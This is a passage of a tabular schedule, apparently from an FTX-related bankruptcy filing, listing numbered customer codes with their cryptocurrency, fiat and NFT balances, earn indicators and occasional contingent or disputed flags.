| 07378250 | | USD[10.00] | | |
| 07378252 | | BRZ[1], DOGE[.82726494], USD[0.07] | | |
| 07378253 | | CUSDT[1], DOGE[1885.1112465], TRX[534.96399449], USD[0.00] | Yes | |
| 07378254 | | CUSDT[1], USD[0.00] | | |
| 07378255 | | USD[10.00] | | |
| 07378256 | | USD[10.00] | | |
| 07378257 | | DOGE[178.74255448], USD[0.00] | | |
| 07378258 | | USD[10.00] | | |
| 07378259 | | USD[10.00] | | |
| 07378260 | | DOGE[153.83539138], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378262 | | USD[10.00] | | |
| 07378263 | | USD[10.00] | | |
| 07378264 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07378265 | | USD[10.00] | | |
| 07378266 | | DOGE[140.27192537], USD[0.00] | | |
| 07378267 | | CUSDT[7], DOGE[1176.71384936], USD[0.20] | | |
| 07378268 | | CUSDT[1], DOGE[425.58918066], USD[0.00] | | |
| 07378272 | | BAT[22.23718883], BTC[.00015865], DOGE[160.18706366], TRX[30.85545705], USD[0.00], USDT[0] | | |
| 07378273 | | BTC[.00001127], DOGE[112.87699275], USD[0.00] | | |
| 07378275 | | DOGE[1], USD[0.01] | | |
| 07378276 | | USD[10.00] | | |
| 07378279 | | CUSDT[2], SHIB[1], USD[0.01] | Yes | |
| 07378280 | | USD[10.00] | | |
| 07378281 | | USD[10.00] | | |
| 07378282 | | USD[10.00] | | |
| 07378283 | | CUSDT[6.00000838], GRT[1.00367791], USD[0.00] | Yes | |
| 07378284 | | CUSDT[2], ETH[.0094216], ETHW[.00929941], TRX[1], USD[104.71] | Yes | |
| 07378285 | | BRZ[1], USD[229.74] | | |
| 07378286 | | BTC[0.00082287], DOGE[6], PAXG[.06850308], TRX[824.00914088], USD[0.00] | | |
| 07378287 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07378288 | | USD[10.00] | | |
| 07378289 | | BAT[19.88059713], USD[0.00] | | |
| 07378290 | | USD[10.00] | | |
| 07378291 | | USD[10.00] | | |
| 07378292 | | CUSDT[1], DOGE[95.60777062], USD[10.58] | | |
| 07378293 | | CUSDT[1], USD[36.28] | Yes | |
| 07378294 | | CUSDT[3], DOGE[965.34043015], TRX[58.16508017], USD[0.00] | | |
| 07378295 | | DOGE[134.69847544], USD[0.00] | | |
| 07378296 | | DOGE[2], USD[0.01] | | |
| 07378297 | | USD[10.00] | | |
| 07378298 | | DOGE[154.48137272], USD[0.00] | Yes | |
| 07378299 | | BRZ[1], CUSDT[3], DOGE[1], TRX[2], USD[0.01], USDT[1] | | |
| 07378300 | | USD[0.00], USDT[0] | | |
| 07378301 | | DOGE[3], USD[0.01] | | |
| 07378302 | | USD[10.00] | | |
| 07378303 | | USD[10.00] | | |
| 07378304 | | CUSDT[2], USD[0.00] | | |
| 07378305 | | DOGE[123.94212299], USD[0.00] | | |
| 07378306 | | USD[11.08] | Yes | |
| 07378307 | | USD[0.01] | | |
| 07378308 | | BRZ[5], BTC[.1788653], CUSDT[38], DOGE[1789.0117565], ETH[.79088706], ETHW[.7905878], GRT[13510.51676939], LINK[7.96435334], MATIC[608.7388255], SHIB[2], SOL[11.76779543], TRX[70.22983631], USD[116.38], USDT[1.03863758] | Yes | |
| 07378309 | | USD[10.00] | | |
| 07378310 | | DOGE[135.31667694], USD[0.00] | | |
| 07378311 | | GRT[1], TRX[1], USD[0.00] | | |
| 07378312 | | BTC[.00022907], DOGE[122.1737396], TRX[467.25519893], USD[0.00] | | |
| 07378313 | | BTC[.00273998], CUSDT[1], DOGE[1207.68760752], USD[10.00] | | |
| 07378314 | | BTC[0], ETH[0], LINK[0], SOL[11.81728601], USD[0.71], USDT[0.00000001] | Yes | |
| 07378315 | | USD[10.00] | | |
| 07378316 | | BRZ[1], BTC[.00522771], CUSDT[1], ETH[.076624], ETHW[.076624], TRX[3], USD[0.00] | | |
| 07378317 | | USD[10.00] | | |
| 07378318 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07378319 | | USD[10.00] | | |
| 07378320 | | USD[10.00] | | |
| 07378321 | | USD[10.00] | | |
| 07378322 | | BRZ[1], TRX[2], USD[0.01], USDT[0] | | |
| 07378323 | | CUSDT[1], TRX[81.18110856], USD[0.00] | | |
| 07378324 | | USD[10.00] | | |
| 07378325 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378326 | | BCH[0], CUSDT[2], DOGE[21.54561631], SHIB[251202.28901133], USD[0.00] | Yes | |
| 07378327 | | USD[10.00] | | |
| 07378328 | | USD[10.00] | | |
| 07378329 | | CUSDT[4], GRT[1], USD[0.00] | | |
| 07378330 | | USD[10.00] | | |
| 07378331 | | USD[10.00] | | |
| 07378333 | | BRZ[1], CUSDT[2], DOGE[3149.18395548], USD[0.00] | | |
| 07378334 | | DOGE[123.09010318], USD[0.00] | | |
| 07378335 | | BAT[1], BRZ[3], CUSDT[4], ETH[.00002713], ETHW[.00002713], TRX[1], USD[0.01] | | |
| 07378336 | | BTC[0], DOGE[1.00002178], USD[0.00] | | |
| 07378337 | | USD[0.00], USDT[0] | | |
| 07378338 | | USD[10.00] | | |
| 07378339 | | CUSDT[2], DOGE[64.77406037], UNI[1.16904852], USD[0.00] | | |
| 07378340 | | USD[10.00] | | |
| 07378341 | | DOGE[1.00355643], USD[95.24] | | |
| 07378342 | | USD[10.00] | | |
| 07378343 | | BAT[0], BTC[0], DAI[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07378344 | | USD[10.00] | | |
| 07378346 | | USD[0.00] | | |
| 07378347 | | DOGE[606.30914227], USD[10.00] | | |
| 07378348 | | USD[0.00] | | |
| 07378349 | | CUSDT[2], DOGE[556.51159029], SOL[1.57486624], TRX[1], USD[0.00] | | |
| 07378350 | | USD[10.00] | | |
| 07378351 | | SOL[1.09252686], USD[0.00] | | |
| 07378352 | | CUSDT[5], TRX[4], USD[0.00] | | |
| 07378353 | | USD[0.00] | | |
| 07378354 | | USD[0.00] | | |
| 07378355 | | DOGE[2], USD[380.62] | | |
| 07378356 | | USD[10.00] | | |
| 07378357 | | BTC[.00136925], CUSDT[13], DOGE[37.87784785], GRT[.09887149], SHIB[138290.47949965], TRX[3], USD[0.01] | | |
| 07378358 | | USD[10.00] | | |
| 07378359 | | DOGE[30.06971302], USD[0.00] | | |
| 07378362 | | CUSDT[8], DOGE[13103.60142082], TRX[2], USD[0.00] | | |
| 07378363 | | USD[0.00] | Yes | |
| 07378364 | | USD[685.64] | | |
| 07378365 | | DOGE[.26767711], SHIB[1], USD[0.00] | Yes | |
| 07378366 | | BAT[0], BCH[0], BRZ[2], CUSDT[5], DOGE[0], GRT[0], TRX[1.00002183], USD[0.01] | | |
| 07378367 | | BAT[1], BRZ[3], TRX[3], USD[0.12] | | |
| 07378368 | | DOGE[393.11673216], ETH[.04171852], ETHW[.04119868], SHIB[1259.85367142], SOL[2.08571756], TRX[69.32205375], USD[0.00] | Yes | |
| 07378369 | | USD[10.00] | | |
| 07378370 | | USD[10.00] | | |
| 07378371 | | BAT[1], USD[0.00] | | |
| 07378372 | | DOGE[24.83226974], USD[0.61] | | |
| 07378374 | | USD[10.00] | | |
| 07378375 | | USD[10.00] | | |
| 07378376 | | USD[10.00] | | |
| 07378377 | | USD[10.00] | | |
| 07378378 | | ETH[0.00548495], ETHW[0.00541650], USD[0.00] | Yes | |
| 07378379 | | USD[10.00] | | |
| 07378380 | | USD[0.00] | | |
| 07378381 | | CUSDT[1], DOGE[2649.42535862], ETH[.06109161], ETHW[.06109161], USD[0.00] | | |
| 07378382 | | CUSDT[1], DOGE[88.29923519], USD[0.00] | | |
| 07378383 | | USD[10.00] | | |
| 07378384 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07378385 | | CUSDT[2], DOGE[1.8415401], USD[149.44] | | |
| 07378386 | | USD[10.00] | | |
| 07378387 | | BRZ[1], CUSDT[1], USD[35.04] | | |
| 07378388 | | DOGE[191.05766081], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378390 | | GRT[9.90453356], USD[0.00] | | |
| 07378391 | | USD[0.00] | Yes | |
| 07378392 | | CUSDT[1], DOGE[1738.11578781], SHIB[1], USD[40.33] | | |
| 07378393 | | USD[0.01], USDT[0] | | |
| 07378394 | | BTC[.00155774], CUSDT[2], DOGE[2651.08191223], USD[110.00] | | |
| 07378395 | | BTC[.00008139], DOGE[0], USD[0.00] | | |
| 07378396 | | CUSDT[1], DOGE[121.08493066], USD[0.00] | | |
| 07378397 | | USD[10.00] | | |
| 07378398 | | CUSDT[3], DOGE[.00078729], ETH[.01324121], ETHW[.01324121], MATIC[18.47108697], USD[0.00] | | |
| 07378399 | | BTC[.00065361], CUSDT[1], USD[0.00] | | |
| 07378400 | | USD[10.00] | | |
| 07378401 | | DOGE[1], TRX[214.24640007], USD[0.00] | | |
| 07378402 | | CUSDT[2], DOGE[0], ETH[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07378403 | | DOGE[180.78601149], USD[10.00] | | |
| 07378404 | | BRZ[2], CUSDT[26], DOGE[.00497162], ETHW[.04883896], SHIB[686603.11120846], SUSHI[.58012911], TRX[5], USD[0.01], USDT[1] | | |
| 07378405 | | BAT[1], CUSDT[2], DOGE[2], USD[0.01] | Yes | |
| 07378406 | | DOGE[98.98957627], USD[2.00] | | |
| 07378407 | | CUSDT[1], DOGE[2594.00041426], USD[10.00] | | |
| 07378408 | | USD[10.00] | | |
| 07378409 | | USD[10.00] | | |
| 07378410 | | BRZ[1], DOGE[.39040288], TRX[1], USD[0.10] | | |
| 07378411 | | USD[10.00] | | |
| 07378412 | | USD[10.04] | Yes | |
| 07378413 | | USD[10.00] | | |
| 07378414 | | DOGE[24.46470771], USD[0.08] | | |
| 07378415 | | SHIB[387778.73527759], USD[0.02] | Yes | |
| 07378416 | | USD[10.00] | | |
| 07378418 | | USD[10.00] | | |
| 07378419 | | DOGE[1], SOL[.00001025], USD[10.14] | | |
| 07378420 | | USD[10.00] | | |
| 07378421 | | DOGE[73.71100098], USD[0.00] | | |
| 07378422 | | DOGE[3405.36334818], USD[10.00] | | |
| 07378423 | | CUSDT[1], DOGE[712.22694626], SHIB[511596.18008185], TRX[1], USD[0.00] | | |
| 07378424 | | USD[10.00] | | |
| 07378425 | | USD[10.00] | | |
| 07378426 | | USD[10.00] | | |
| 07378427 | | USD[10.00] | | |
| 07378428 | | TRX[1], USD[0.00] | | |
| 07378429 | | DOGE[227.3555076], USD[0.00] | Yes | |
| 07378430 | | USD[10.00] | | |
| 07378431 | | USD[10.00] | | |
| 07378432 | | USD[10.00] | | |
| 07378433 | | USD[10.00] | | |
| 07378434 | | BTC[.00198968], CUSDT[1054.70758267], DOGE[2040.33171962], ETH[.04313595], ETHW[.04260243], TRX[1621.20258653], USD[6.04] | Yes | |
| 07378435 | | AAVE[1.07168198], ALGO[1162.76875105], AVAX[12.55965688], BAT[12948.06194127], BCH[.15079979], BRZ[1], BTC[.00810115], CUSDT[25515.62473046], DOGE[32578.26462370], ETH[.68395006], ETHW[5.41325014], GRT[12119.56972777], LINK[38.7336141], LTC[1.0521506], MATIC[1081.55635713], NEAR[13.85408215], NFT[508697612464315698/Founding Frens Lawyer #722][1], NFT[530094281649145307/FTX - Off The Grid Miami #2350][1], NFT[541754792230437717/Barcelona Ticket Stub #1212][1], NFT[574582915985230138/Entrance Voucher #1722][1], SHIB[373085355.93285012], SOL[10.1927823], SUSHI[217.68323977], TRX[22872.24268342], UNI[23.41709951], USD[230.12], USD[100], YFI[0] | Yes | |
| 07378436 | | BAT[2.0165555], BRZ[2], CUSDT[3], DOGE[10515.72274965], GRT[0.18195678], TRX[1], USD[523.48], USDT[0] | Yes | |
| 07378437 | | CUSDT[6], DOGE[1408.65090936], TRX[2], USD[129.52] | | |
| 07378438 | | CUSDT[1], DOGE[256.08627246], USD[0.02] | | |
| 07378440 | | DOGE[0], USD[0.00] | | |
| 07378442 | | USD[10.00] | | |
| 07378443 | | BAT[1], CUSDT[2], ETHW[.16610125], TRX[2], USD[0.00] | | |
| 07378444 | | USD[10.00] | | |
| 07378445 | | CUSDT[1], SHIB[1], USD[17.64] | | |
| 07378446 | | USD[10.00] | | |
| 07378447 | | USD[0.01] | | |
| 07378448 | | CUSDT[4], USD[8.45] | Yes | |
| 07378449 | | DOGE[132.6831153], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378450 | | BRZ[1], CUSDT[14], DOGE[3096.59959769], ETH[.05238998], ETHW[.05238998], GRT[1], SHIB[3619126.62173152], TRX[2], USD[0.00] | | |
| 07378451 | | USD[10.00] | | |
| 07378452 | | USD[10.00] | | |
| 07378453 | | USD[10.00] | | |
| 07378454 | | BTC[.00008264], DOGE[.93901718], ETH[.05391764], ETHW[.05391764], USD[-29.22] | | |
| 07378455 | | USD[0.00] | | |
| 07378456 | | BRZ[1], CUSDT[7], ETH[.00789124], ETHW[.00779548], SUSHI[.00005307], USD[0.00] | Yes | |
| 07378457 | | USD[0.00] | | |
| 07378458 | | DOGE[274.7421987], USD[0.00] | | |
| 07378459 | | USD[10.00] | | |
| 07378460 | | USD[0.01] | | |
| 07378461 | | BRZ[0], BTC[0], DOGE[0], GRT[0], LINK[0], TRX[0], USD[0.01] | | |
| 07378462 | | USD[10.00] | | |
| 07378463 | | BAT[1], BRZ[3], CUSDT[10], DOGE[2145.7925696], GRT[1], LINK[.00002831], LTC[8.43062228], TRX[13], USD[0.01], USDT[1] | | |
| 07378464 | | USD[10.00] | | |
| 07378465 | | USD[0.15] | | |
| 07378466 | | USD[10.00] | | |
| 07378467 | | DOGE[147.34777685], USD[0.00] | | |
| 07378468 | | DOGE[514.33101544], TRX[1], USD[0.00] | Yes | |
| 07378469 | | USD[10.00] | | |
| 07378470 | | BRZ[2], CUSDT[11], DOGE[196.26541291], KSHIB[153.96417869], TRX[1341.88391463], USD[0.00] | Yes | |
| 07378471 | | TRX[548.98420772], USD[0.00] | | |
| 07378472 | | DOGE[74.49888326], USD[0.00] | | |
| 07378473 | | NFT (549543950533913365/Australia Ticket Stub #2084)[1], USD[1417.37] | | |
| 07378474 | | DOGE[.00390423], USD[0.00] | | |
| 07378476 | | CUSDT[0], DOGE[0], USD[0.00] | | |
| 07378477 | | CUSDT[2], DOGE[414.53287727], SOL[.97442968], USD[0.00] | Yes | |
| 07378478 | | SHIB[3], USD[0.00] | Yes | |
| 07378479 | | USD[10.00] | | |
| 07378480 | | USD[10.00] | | |
| 07378481 | | USD[0.00] | | |
| 07378482 | | CUSDT[5], DOGE[0.00086478], SHIB[1], TRX[.0007681], USD[0.24] | | |
| 07378484 | | USD[10.00] | | |
| 07378485 | | BAT[84.5354439], BRZ[1], BTC[.0059053], CUSDT[4], DOGE[1196.48831739], LTC[.0000458], SHIB[780416.52256138], SOL[1.62259601], TRX[1], USD[0.01] | Yes | |
| 07378486 | | USD[10.00] | | |
| 07378487 | | BTC[.00032361], DOGE[198.64787911], USD[30.00] | | |
| 07378488 | | DOGE[125.11180303], USD[0.00] | | |
| 07378489 | | SHIB[33367978.54556143], USD[0.00] | Yes | |
| 07378490 | | USD[10.00] | | |
| 07378491 | | USD[10.00] | | |
| 07378492 | | DOGE[6357.81160812], USD[0.00] | | |
| 07378493 | | USD[10.00] | | |
| 07378494 | | USD[0.13] | | |
| 07378495 | | USD[0.01] | | |
| 07378496 | | DOGE[.30417045], USD[0.00] | | |
| 07378498 | | BCH[.00663558], BTC[.00015508], CUSDT[1], DOGE[43.76997294], ETH[.0051857], ETHW[.0051857], USD[9.40] | | |
| 07378499 | | CUSDT[7], DOGE[5732.15802489], TRX[3516.92862471], USD[0.00] | Yes | |
| 07378500 | | DOGE[1], MATIC[54.58107374], SHIB[2], TRX[2], USD[0.00] | Yes | |
| 07378501 | | DOGE[1], TRX[1], USD[50.08] | | |
| 07378502 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07378503 | | ETH[.005827], ETHW[.005827], USD[0.00] | | |
| 07378504 | | DOGE[141.56642112], USD[0.00] | | |
| 07378505 | | USD[0.00] | | |
| 07378507 | | BAT[2.05473383], BRZ[2], CUSDT[1], DOGE[27008.13693099], ETH[12.45104955], ETHW[12.44721397], GRT[1.00130938], LINK[1324.904752], MATIC[1107.54492627], SOL[104.92035697], SUSHI[1.05773023], TRX[7576.92114818], USD[9999.00] | Yes | |
| 07378508 | | DOGE[2983.53992376], USD[0.00] | Yes | |
| 07378509 | | CUSDT[469.89338955], DOGE[208.7908211], GRT[1], LINK[1], USD[0.00] | | |
| 07378510 | | BRZ[2], BTC[.00040296], CUSDT[521.85808296], DOGE[1697.71797004], USD[10.91] | Yes | |
| 07378512 | | BTC[.00016801], DOGE[69.39776455], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378513 | | CUSDT[2], DOGE[12992.96694105], TRX[1], USD[0.00] | | |
| 07378515 | | USD[10.00] | | |
| 07378517 | | USD[0.00] | | |
| 07378518 | | BTC[0], USD[0.00] | | |
| 07378519 | | BTC[.00000378], CUSDT[1], DOGE[1.00137921], MATIC[0.00010161], SOL[0.00000150], USD[0.30], USDT[0] | Yes | |
| 07378521 | | BTC[.00017528], USD[2.00] | | |
| 07378522 | | DOGE[140.43085872], USD[0.00] | | |
| 07378523 | | CUSDT[1], DOGE[2.00004466], TRX[1], USD[0.01] | | |
| 07378524 | | DOGE[93.6693465], ETH[.0055301], ETHW[.0055301], GRT[1], TRX[1], USD[0.00] | | |
| 07378525 | | USD[10.00] | | |
| 07378526 | | BTC[.00000174], USD[0.01] | | |
| 07378527 | | CUSDT[6], TRX[3], USD[0.01] | Yes | |
| 07378528 | | CUSDT[1], TRX[1], USD[336.93] | | |
| 07378529 | | BTC[.00021522], USD[0.00] | | |
| 07378530 | | USD[0.00], USDT[0] | | |
| 07378531 | | USD[10.00] | | |
| 07378533 | | USD[0.00] | | |
| 07378534 | | USD[10.00] | | |
| 07378535 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07378536 | | USD[10.00] | | |
| 07378537 | | DOGE[4595.79210851], ETH[.05620963], ETHW[.05620963], SHIB[2509268.75435245], TRX[1], USD[0.00] | | |
| 07378538 | | BCH[0.23197237], BTC[0], DOGE[0], LTC[0], SOL[0], USD[0.02] | | |
| 07378540 | | USD[10.00] | | |
| 07378541 | | DOGE[1], USD[0.00] | | |
| 07378542 | | DOGE[2423.35533603], USD[10.00] | | |
| 07378543 | | DOGE[191.04695126], TRX[1], USD[0.00] | | |
| 07378544 | | USD[0.01] | | |
| 07378545 | | USD[10.00] | | |
| 07378546 | | BRZ[1], CUSDT[3], TRX[3], USD[0.25], USDT[.07] | | |
| 07378547 | | GRT[1], TRX[1], USD[17.02], USDT[1] | | |
| 07378548 | | TRX[3], USD[0.01], USDT[1] | | |
| 07378549 | | USD[10.00] | | |
| 07378551 | | BTC[.00023862], CUSDT[3], DOGE[119.62967916], NFT (308783848498131554/Coachella x FTX Weekend 2 #2741)[1], USD[0.00] | | |
| 07378552 | | USD[10.00], USDT[0] | | |
| 07378553 | | BRZ[1], CUSDT[1], DOGE[6103.79460088], USD[0.00] | | |
| 07378554 | | BAT[.02363169], DOGE[0], ETH[0], USD[0.01] | | |
| 07378555 | | USD[10.00] | | |
| 07378556 | | AAVE[0], AVAX[0], BTC[0], DAI[0], ETH[0.00000782], ETHW[0], LINK[0.00062674], MATIC[0.00538138], SHIB[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07378557 | | BAT[0], BTC[0], CUSDT[11], DOGE[1889.24309915], SUSHI[0], TRX[1], USD[0.00] | | |
| 07378558 | | ALGO[2.54182877], AUD[1.29], BAT[3.46985056], BTC[.00269809], CUSDT[1], DAI[.99217211], DOGE[774.92203723], EUR[1.81], GRT[16.49639858], SHIB[1313602.47133069], TRX[133.8668235], USD[0.01], USDT[3.25701861] | Yes | |
| 07378559 | | BAT[4], USD[0.00] | | |
| 07378560 | | DOGE[173.78643628], USD[0.00] | | |
| 07378561 | | USD[0.03] | | |
| 07378562 | | USD[10.00] | | |
| 07378563 | | BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], MATIC[0.05730417], USD[0.00], USDT[0] | Yes | |
| 07378564 | | CUSDT[3], DOGE[.01267497], ETH[.00000009], ETHW[.00000009], TRX[1], USD[0.00], USDT[.00001826] | Yes | |
| 07378565 | | USD[10.00] | | |
| 07378567 | | CUSDT[1], DOGE[144.81179871], SHIB[209293.65147694], TRX[19.08005593], USD[0.00] | | |
| 07378568 | | CUSDT[2], DOGE[1], USD[10.00] | | |
| 07378569 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07378570 | | CUSDT[3], USD[0.00], USDT[0] | | |
| 07378571 | | BRZ[4], CUSDT[7], DOGE[0], ETH[0], GRT[2], SOL[0], TRX[2], USD[0.00], USDT[0] | | |
| 07378572 | | CUSDT[3], DOGE[1], ETH[.07406867], ETHW[.07406867], TRX[2], USD[0.03] | | |
| 07378573 | | DOGE[.11], USD[0.00] | | |
| 07378574 | | DOGE[0], ETH[0.00183035], ETHW[0.00180299], GRT[0], USD[0.00] | Yes | |
| 07378575 | | BRZ[2], CUSDT[3], DOGE[1487.25569145], ETH[.71331425], ETHW[.71301479], USD[10.88] | Yes | |
| 07378577 | | BTC[0], DOGE[0], TRX[0], USD[0.01], USDT[0] | | |
| 07378579 | | CUSDT[1], DOGE[.00002752], USD[322.76] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378582 | | BRZ[1], CUSDT[4], TRX[1], USD[0.00] | | |
| 07378583 | | CUSDT[14], DOGE[925.65748427], TRX[503.17090275], USD[0.00] | Yes | |
| 07378584 | | USD[10.00] | | |
| 07378585 | | CUSDT[2], DOGE[137.78224895], USD[0.00] | | |
| 07378586 | | DOGE[793.38308476], USD[0.00] | Yes | |
| 07378587 | | USD[10.00] | | |
| 07378588 | | CUSDT[1], DOGE[.00000342], USD[18.42] | | |
| 07378589 | | BAT[2], CUSDT[14], DOGE[1.00003719], ETH[0], GRT[1], USD[0.01], USDT[2] | | |
| 07378590 | | USD[10.00] | | |
| 07378591 | | USD[10.00] | | |
| 07378592 | | BRZ[3], CUSDT[8], DOGE[117.19280297], ETH[.03622584], ETHW[.03622584], TRX[3], USD[0.00] | | |
| 07378593 | | USD[10.00] | | |
| 07378594 | | BRZ[1], CUSDT[111.44212342], USD[0.02] | Yes | |
| 07378595 | | USD[10.00] | | |
| 07378596 | | BAT[13.77739076], BRZ[1], CAD[11.86], CUSDT[13], DOGE[468.61221366], TRX[110.82614783], USD[0.00] | | |
| 07378597 | | DOGE[1.00079105], USD[32.18] | | |
| 07378598 | | BTC[0.00418180], DOGE[1606.28592872], USD[0.00] | | |
| 07378599 | | DOGE[587.09605149], TRX[1], USD[10.00] | | |
| 07378600 | Contingent, Disputed | DOGE[143.64963738], TRX[1], USD[0.00] | | |
| 07378601 | | USD[10.00] | | |
| 07378602 | | USD[10.00] | | |
| 07378603 | | DOGE[1.00011113], TRX[1], USD[0.01] | | |
| 07378604 | | BTC[.00000504], CUSDT[2], DOGE[86.75246878], TRX[8.86139676], USD[0.00] | Yes | |
| 07378605 | | BTC[.00000002], CUSDT[1], USD[0.00] | Yes | |
| 07378606 | | DOGE[141.18315436], USD[0.00] | | |
| 07378607 | | USD[10.00] | | |
| 07378608 | | DOGE[57.61657236], SHIB[134973.00539892], USD[0.46] | | |
| 07378609 | | CUSDT[1], DOGE[504.09547149], USD[5.00] | | |
| 07378610 | | DOGE[135.58842188], USD[0.00] | | |
| 07378611 | | USD[0.00] | Yes | |
| 07378612 | | USD[10.00] | | |
| 07378613 | | CUSDT[4], DOGE[104.16767035], KSHIB[379.22110758], NFT (37355988158051194 7/NOFUDS 1-3 #3)[1], SHIB[1100052.25842526], SOL[.04003709], USD[0.14], USDT[0] | Yes | |
| 07378614 | | BRZ[2], CUSDT[1], ETH[.77257278], ETHW[.77257278], GRT[3], SHIB[2], TRX[2], USD[0.00], USDT[2] | | |
| 07378615 | | USD[10.00] | | |
| 07378616 | | BAT[17.584781], USD[0.00] | Yes | |
| 07378617 | | DAI[0.00022974], DOGE[0], GRT[0], TRX[0], USD[0.00] | | |
| 07378618 | | DOGE[125.70617012], USD[0.00] | | |
| 07378620 | | USD[10.00] | | |
| 07378622 | | USD[10.00] | | |
| 07378623 | | USD[0.25] | | |
| 07378624 | | CUSDT[1], USD[81.43] | | |
| 07378625 | | BAT[0], BRZ[3], BTC[0], CUSDT[29], DOGE[1], GRT[328.57037671], MATIC[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07378626 | | CUSDT[1], USD[0.00] | | |
| 07378628 | | USD[441.95] | | |
| 07378629 | | USD[10.00] | | |
| 07378630 | | DOGE[143.05073136], USD[0.00] | | |
| 07378631 | | BTC[0], DOGE[37.26971889], USD[0.00] | | |
| 07378632 | | BCH[.01925687], USD[0.00] | | |
| 07378633 | | BAT[1.01615646], BCH[.04512838], BRZ[61.2174181], BTC[.00131145], CUSDT[2.20425452], DOGE[1535.45061594], EUR[8.91], KSHIB[171.3178027], SHIB[345147.08274035], SUSHI[.91980564], USD[0.00], USDT[.29850119] | Yes | |
| 07378635 | | DOGE[265.74529144], USD[0.00] | | |
| 07378636 | | BTC[.00039707], CUSDT[4], GRT[3], USD[0.00] | | |
| 07378637 | | CUSDT[1], DOGE[.00005198], TRX[2], USD[0.00] | | |
| 07378638 | | BTC[0], DOGE[0], GRT[0], USD[0.00], YFI[0.00000588] | | |
| 07378639 | | USD[10.00] | | |
| 07378640 | | USD[10.00] | | |
| 07378641 | | USD[10.00] | | |
| 07378642 | | BRZ[1], CUSDT[5], DOGE[1], SHIB[4669564.07855497], TRX[3], USD[0.00] | | |
| 07378643 | | CUSDT[9], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378644 | | BRZ[1], CUSDT[3], DOGE[.95426604], TRX[3], USD[0.01] | | |
| 07378645 | | CUSDT[2], USD[0.01] | Yes | |
| 07378646 | | USD[10.00] | | |
| 07378647 | Contingent, Disputed | BTC[.00017073], DOGE[0], ETH[0], GRT[0], MATIC[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07378648 | | USD[10.00] | | |
| 07378649 | | USD[10.00] | | |
| 07378650 | | USD[10.00] | | |
| 07378651 | | AUD[6.38], BAT[16.73664172], DOGE[1], GRT[4.71035643], TRX[269.45994832], USD[0.00] | | |
| 07378652 | | DOGE[1], ETH[.03021532], ETHW[.03021532], LINK[.20844301], USD[0.00] | | |
| 07378654 | | DOGE[36.70211258], USD[0.00] | | |
| 07378655 | | DOGE[138.66856136], USD[0.00] | | |
| 07378656 | | USD[0.01] | | |
| 07378657 | | USD[0.01], USDT[1] | | |
| 07378658 | | USD[10.00] | | |
| 07378659 | | USD[10.00] | | |
| 07378660 | | BTC[.00021085], USD[0.00] | | |
| 07378661 | | CUSDT[4], DOGE[769.85598631], USD[0.76] | Yes | |
| 07378662 | | BAT[.00007025], BRZ[1], CUSDT[21], DOGE[173.22268915], GRT[.0000367], LINK[.00008676], SOL[.00003003], TRX[1.00096667], USD[0.00], USDT[0] | | |
| 07378663 | | CUSDT[1], DOGE[120.90473821], USD[0.59] | | |
| 07378665 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07378666 | | USD[10.00] | | |
| 07378667 | | BTC[.00020566], USD[0.00] | | |
| 07378669 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07378670 | | BAT[7], BRZ[13], CUSDT[29], DOGE[1], ETH[0], GRT[4], TRX[13], USD[0.01], USDT[6] | | |
| 07378671 | | USD[10.00] | | |
| 07378672 | | USD[10.00] | | |
| 07378673 | | DOGE[704.07000259], USD[0.00] | Yes | |
| 07378674 | | CUSDT[2], DOGE[.00003473], SHIB[1257692.85616455], SOL[.00000965], TRX[2], USD[0.30] | Yes | |
| 07378675 | | DOGE[1.00001699], TRX[1], USD[0.01] | | |
| 07378676 | | SUSHI[.69284532], USD[0.00] | | |
| 07378677 | | USD[10.00] | | |
| 07378678 | | BTC[0], USD[6.66] | Yes | |
| 07378679 | | CUSDT[17], DOGE[65.53775555], TRX[2], USD[0.00] | Yes | |
| 07378680 | | CUSDT[2], ETH[.00473223], ETHW[.00473223], USD[0.00] | | |
| 07378681 | | DOGE[2409.324], USD[0.01] | | |
| 07378682 | | USD[10.00] | | |
| 07378685 | | USD[10.00] | | |
| 07378686 | | KSHIB[40.32498749], USD[0.00], USDT[0] | Yes | |
| 07378687 | | CUSDT[8], DOGE[2], KSHIB[0], SHIB[6563695.12852013], TRX[2], USD[0.00] | Yes | |
